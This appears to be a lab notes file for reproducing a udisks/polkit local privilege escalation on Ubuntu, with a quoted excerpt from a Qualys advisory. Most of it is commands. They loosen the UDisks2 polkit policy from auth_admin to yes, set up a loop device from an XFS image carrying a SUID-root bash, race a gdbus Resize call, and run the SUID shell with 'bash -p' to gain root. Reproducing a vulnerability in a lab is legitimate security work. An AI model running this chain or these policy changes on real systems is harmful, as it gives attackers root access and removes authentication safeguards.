1.6 KiB
1.6 KiB
Setup fake CVE-2025-6018 (For Ubuntu)
sudo apt update
sudo apt install xfsprogs
sudo sed -i 's/<allow_any>auth_admin<\/allow_any>/<allow_any>yes<\/allow_any>/g' /usr/share/polkit-1/actions/org.freedesktop.UDisks2.policy
sudo sed -i 's/<allow_inactive>auth_admin<\/allow_inactive>/<allow_inactive>yes<\/allow_inactive>/g' /usr/share/polkit-1/actions/org.freedesktop.UDisks2.policy
sudo sed -i 's/<allow_active>auth_admin<\/allow_active>/<allow_active>yes<\/allow_active>/g' /usr/share/polkit-1/actions/org.freedesktop.UDisks2.policy
sudo systemctl restart polkit
udisksctl loop-setup --file ./xfs.image --no-user-interaction
while true; do /tmp/blockdev*/bash -c 'sleep 10; ls -l /tmp/blockdev*/bash' && break; done 2>/dev/null &
gdbus call --system --dest org.freedesktop.UDisks2 --object-path /org/freedesktop/UDisks2/block_devices/loop0 --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'
find /tmp | grep blockdev
mount
/tmp/blockdev*/bash -p
From: https://cdn2.qualys.com/2025/06/17/suse15-pam-udisks-lpe.txt
1/ On our own attacker machine, as root, we create an XFS image that
contains a SUID-root shell, and copy it to the victim machine:
------------------------------------------------------------------------
attacker# dd if=/dev/zero of=./xfs.image bs=1M count=300
attacker# mkfs.xfs ./xfs.image
attacker# mkdir ./xfs.mount
attacker# mount -t xfs ./xfs.image ./xfs.mount
attacker# cp /bin/bash ./xfs.mount
attacker# chmod 04555 ./xfs.mount/bash
attacker# umount ./xfs.mount
attacker# scp -i id_ed25519 ./xfs.image nobody@victim: